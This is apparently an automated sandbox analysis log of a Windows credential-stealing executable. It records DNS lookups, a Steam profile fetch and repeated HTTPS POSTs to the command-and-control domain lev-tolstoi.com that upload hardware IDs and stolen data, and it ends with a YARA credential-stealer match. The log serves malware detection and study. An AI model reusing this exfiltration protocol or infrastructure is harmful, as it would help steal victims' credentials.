Dec 26, 2024 13:09:23.592289925 CET | 1.1.1.1 | 192.168.2.5 | 0x82f6 | Name error (3) | bashfulacid.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:09:23.733939886 CET | 1.1.1.1 | 192.168.2.5 | 0x3766 | No error (0) | steamcommunity.com | | 104.102.49.254 | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:09:26.541241884 CET | 1.1.1.1 | 192.168.2.5 | 0xb884 | No error (0) | lev-tolstoi.com | | 172.67.157.254 | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:09:26.541241884 CET | 1.1.1.1 | 192.168.2.5 | 0xb884 | No error (0) | lev-tolstoi.com | | 104.21.66.86 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                                                  • steamcommunity.com
                                                                                                                                                                                                                                  • lev-tolstoi.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 104.102.49.254 | 443 | 6460 | C:\Users\user\Desktop\YKri2nEBWE.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-26 12:09:25 UTC | 219 | OUT | GET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Host: steamcommunity.com
2024-12-26 12:09:26 UTC | 1905 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                  Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                  Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                  Date: Thu, 26 Dec 2024 12:09:25 GMT
                                                                                                                                                                                                                                  Content-Length: 35121
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Set-Cookie: sessionid=993923a1e5572274823263e9; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                  Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-26 12:09:26 UTC | 14479 | IN | Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-26 12:09:26 UTC | 16384 | IN | Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
2024-12-26 12:09:26 UTC | 3768 | IN | Data Ascii: </div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_persona_name"
2024-12-26 12:09:26 UTC | 490 | IN | Data Ascii: r Agreement</a> &nbsp;| &nbsp;<a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div class="bt


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49705 | 172.67.157.254 | 443 | 6460 | C:\Users\user\Desktop\YKri2nEBWE.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-26 12:09:27 UTC | 262 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Content-Length: 8
                                                                                                                                                                                                                                  Host: lev-tolstoi.com
2024-12-26 12:09:27 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-26 12:09:28 UTC | 1123 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Thu, 26 Dec 2024 12:09:28 GMT
                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=1o7k7uv9ptfqt0lslu4ecitln3; expires=Mon, 21 Apr 2025 05:56:07 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tcOlpK5JgRPh5bJsBirOACcbefqw3iZq2ZGd7GH79MsvzK11D76cN%2B9SUe9PJrmY1lMA2ZImC5AtpUAF7WqRc%2Fznx3ufktsaUDRluL98uDys1xl%2BdawlbE1vDwHi35DXRr4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 8f80f64ef99d0f6f-EWR
                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1472&min_rtt=1465&rtt_var=564&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=906&delivery_rate=1914754&cwnd=209&unsent_bytes=0&cid=534b6e505c957823&ts=792&x=0"
2024-12-26 12:09:28 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-26 12:09:28 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49706 | 172.67.157.254 | 443 | 6460 | C:\Users\user\Desktop\YKri2nEBWE.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-26 12:09:29 UTC | 263 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Content-Length: 53
                                                                                                                                                                                                                                  Host: lev-tolstoi.com
2024-12-26 12:09:29 UTC | 53 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                                                                                                                                                  Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-12-26 12:09:30 UTC | 1121 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Thu, 26 Dec 2024 12:09:30 GMT
                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=b03u04m5ffmgq5u922rfpd6me0; expires=Mon, 21 Apr 2025 05:56:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UhgX6cuOS16OF2XIMAWnE6w83L84yIgbgdvJbezsvSXZJj2qEwMSDMkOW6PH4xQ%2FQ8LFFSlG82gjFesjFR0WX1%2BXoyWXJ5JaNo21LbSwstidlw64AP9iS6T5GfTxxwYEqBU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 8f80f65c3fbc43a1-EWR
                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1793&min_rtt=1786&rtt_var=675&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=952&delivery_rate=1634938&cwnd=233&unsent_bytes=0&cid=0f78583ea17c74f4&ts=778&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49707 | 172.67.157.254 | 443 | 6460 | C:\Users\user\Desktop\YKri2nEBWE.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-26 12:09:32 UTC | 275 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=KXFK18MULF3J
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Content-Length: 12805
                                                                                                                                                                                                                                  Host: lev-tolstoi.com
2024-12-26 12:09:32 UTC | 12805 | OUT | Data Raw: 2d 2d 4b 58 46 4b 31 38 4d 55 4c 46 33 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 42 44 44 37 42 34 37 37 45 32 44 44 31 39 38 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 4b 58 46 4b 31 38 4d 55 4c 46 33 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4b 58 46 4b 31 38 4d 55 4c 46 33 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 4b 58 46 4b 31 38 4d 55
                                                                                                                                                                                                                                  Data Ascii: --KXFK18MULF3JContent-Disposition: form-data; name="hwid"CBDD7B477E2DD198BEBA0C6A975F1733--KXFK18MULF3JContent-Disposition: form-data; name="pid"2--KXFK18MULF3JContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--KXFK18MU
2024-12-26 12:09:36 UTC | 1129 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Thu, 26 Dec 2024 12:09:35 GMT
                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=q4aji8hmknsavhos07kmnbcfj1; expires=Mon, 21 Apr 2025 05:56:13 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ca61AaKr3tD%2Bclhl9Jxa8wEc8frziceRVhQqBUZM1M1EeTlslN5C5oUQ%2Bimlu%2FsMLjGbMORTkDBAsiBzwrDNCP%2FK4GPSOPDHXyZkw2FEfSWUR7Fm45YFIPumSb03Dd2Dlxg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 8f80f66c6e2c0c9e-EWR
                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1760&min_rtt=1696&rtt_var=764&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2836&recv_bytes=13738&delivery_rate=1320669&cwnd=32&unsent_bytes=0&cid=8b710f8e4df3ca60&ts=3403&x=0"
2024-12-26 12:09:36 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-26 12:09:36 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49709 | 172.67.157.254 | 443 | 6460 | C:\Users\user\Desktop\YKri2nEBWE.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-26 12:09:37 UTC | 282 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=VKT7L0W22DT4VG3WF7N
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Content-Length: 15089
                                                                                                                                                                                                                                  Host: lev-tolstoi.com
2024-12-26 12:09:37 UTC | 15089 | OUT | Data Ascii:
--VKT7L0W22DT4VG3WF7N
Content-Disposition: form-data; name="hwid"

CBDD7B477E2DD198BEBA0C6A975F1733
--VKT7L0W22DT4VG3WF7N
Content-Disposition: form-data; name="pid"

2
--VKT7L0W22DT4VG3WF7N
Content-Disposition: form-data; name="lid"

LOGS11--Li
2024-12-26 12:09:38 UTC | 1127 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Thu, 26 Dec 2024 12:09:38 GMT
                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=qtbvik64mr1auh2trah6fa7u37; expires=Mon, 21 Apr 2025 05:56:17 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sSFrmOdt05I9css%2BxdCbq3ll16j6trBqXl30hImvf%2B4rNTX7YETZ3B4w2e7E05unM3l0JLQt3TV6LnFOD5tvGX5lMIo9tIB5%2FmgwoLCRgztXNhJDcYDP6x86rCqY71iKGMY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 8f80f68abefd32ca-EWR
                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1964&min_rtt=1924&rtt_var=801&sent=12&recv=20&lost=0&retrans=0&sent_bytes=2835&recv_bytes=16029&delivery_rate=1301247&cwnd=221&unsent_bytes=0&cid=6b19a7bb2f9ab54a&ts=993&x=0"
2024-12-26 12:09:38 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-26 12:09:38 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49717 | 172.67.157.254 | 443 | 6460 | C:\Users\user\Desktop\YKri2nEBWE.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-26 12:09:40 UTC | 276 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=GMDSDS57JOWEY
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Content-Length: 20543
                                                                                                                                                                                                                                  Host: lev-tolstoi.com
2024-12-26 12:09:40 UTC | 15331 | OUT | Data Ascii:
--GMDSDS57JOWEY
Content-Disposition: form-data; name="hwid"

CBDD7B477E2DD198BEBA0C6A975F1733
--GMDSDS57JOWEY
Content-Disposition: form-data; name="pid"

3
--GMDSDS57JOWEY
Content-Disposition: form-data; name="lid"

LOGS11--LiveTraffic
--GMDSD
2024-12-26 12:09:40 UTC | 5212 | OUT | Data Ascii: F3Wun 4F([:7s~X`nO`i
2024-12-26 12:09:41 UTC | 1138 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Thu, 26 Dec 2024 12:09:41 GMT
                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=rqgnka1hi58i193d4616b2eik1; expires=Mon, 21 Apr 2025 05:56:20 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dG%2BresSCpYZpH%2BJgkJogWNW086Z%2BOMak%2BiOchPfKsyxJ3PQUzWW0zfkUttgjw%2BrxNj6gX6HbLg9j4l%2FmForgK4c4XFWjdkhq%2BkVuiUyLrrXX%2BuxGRfvpfBYHqg39b3h00IQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 8f80f69dbad843c8-EWR
                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1591&min_rtt=1579&rtt_var=617&sent=19&recv=26&lost=0&retrans=0&sent_bytes=2836&recv_bytes=21499&delivery_rate=1738095&cwnd=192&unsent_bytes=0&cid=930a85ea18d5e0ac&ts=1024&x=0"
2024-12-26 12:09:41 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-26 12:09:41 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49729 | 172.67.157.254 | 443 | 6460 | C:\Users\user\Desktop\YKri2nEBWE.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-26 12:09:43 UTC | 275 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=6D1VSVWUV9B0Q
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Content-Length: 1217
                                                                                                                                                                                                                                  Host: lev-tolstoi.com
2024-12-26 12:09:43 UTC | 1217 | OUT | Data Ascii:
--6D1VSVWUV9B0Q
Content-Disposition: form-data; name="hwid"

CBDD7B477E2DD198BEBA0C6A975F1733
--6D1VSVWUV9B0Q
Content-Disposition: form-data; name="pid"

1
--6D1VSVWUV9B0Q
Content-Disposition: form-data; name="lid"

LOGS11--LiveTraffic
--6D1VS
2024-12-26 12:09:44 UTC | 1122 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Thu, 26 Dec 2024 12:09:44 GMT
                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=fmjeeo8huct6947f4vbhdlhkek; expires=Mon, 21 Apr 2025 05:56:23 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hp%2Bg8eX%2FYwn24OnN6Q4FQxh3emYydlgy2Em7HOHb7BdsjapYstCEhxSJRmFFFrTm9BLADTZhQIRSvwncZfWg9RmdO1C4D9HJbc2adjcKkofKPzAWZb44YheM0FzVtSRCQH4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 8f80f6b0adf44297-EWR
                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1724&min_rtt=1720&rtt_var=654&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=2128&delivery_rate=1660978&cwnd=245&unsent_bytes=0&cid=2ada217dbcbfb15d&ts=804&x=0"
2024-12-26 12:09:44 UTC    20    IN    Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: f
ok 8.46.123.189
2024-12-26 12:09:44 UTC    5    IN    Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID:7
Source IP:192.168.2.5
Source Port:49736
Destination IP:172.67.157.254
Destination Port:443
PID:6460
Process:C:\Users\user\Desktop\YKri2nEBWE.exe

Timestamp    Bytes transferred    Direction    Data
2024-12-26 12:09:46 UTC    278    OUT    POST /api HTTP/1.1
                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=D4K1U7QC7LXR63
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Content-Length: 572733
                                                                                                                                                                                                                                  Host: lev-tolstoi.com
2024-12-26 12:09:46 UTC    15331    OUT    Data Ascii:
--D4K1U7QC7LXR63
Content-Disposition: form-data; name="hwid"

CBDD7B477E2DD198BEBA0C6A975F1733
--D4K1U7QC7LXR63
Content-Disposition: form-data; name="pid"

1
--D4K1U7QC7LXR63
Content-Disposition: form-data; name="lid"

LOGS11--LiveTraffic
--D4
2024-12-26 12:09:49 UTC    1131    IN    HTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Thu, 26 Dec 2024 12:09:49 GMT
                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=987ivm9cmh5qm9ldcrucrvusch; expires=Mon, 21 Apr 2025 05:56:27 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gdogTtgVEw3BOCbK1yvdKhUoKerX6oUHSYlD7OzIqVi94bmxfol%2Bx0HD2KxpviIwOFVU3w%2FQEblmDGOM52CTWnY%2FO1VZGJBbFKcqQQ2tCnrwulmmxeH5KyRnj0p1mnddZGs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 8f80f6c0db85c335-EWR
                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1703&min_rtt=1699&rtt_var=645&sent=346&recv=600&lost=0&retrans=0&sent_bytes=2834&recv_bytes=575275&delivery_rate=1685912&cwnd=165&unsent_bytes=0&cid=9516870d3d37e9a9&ts=3718&x=0"



                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                  Start time:07:09:20
                                                                                                                                                                                                                                  Start date:26/12/2024
                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\YKri2nEBWE.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\YKri2nEBWE.exe"
                                                                                                                                                                                                                                  Imagebase:0xc40000
                                                                                                                                                                                                                                  File size:2'920'448 bytes
                                                                                                                                                                                                                                  MD5 hash:1C4C5CCA8B9C930895E0E425563CF07E
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2283078885.000000000159E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
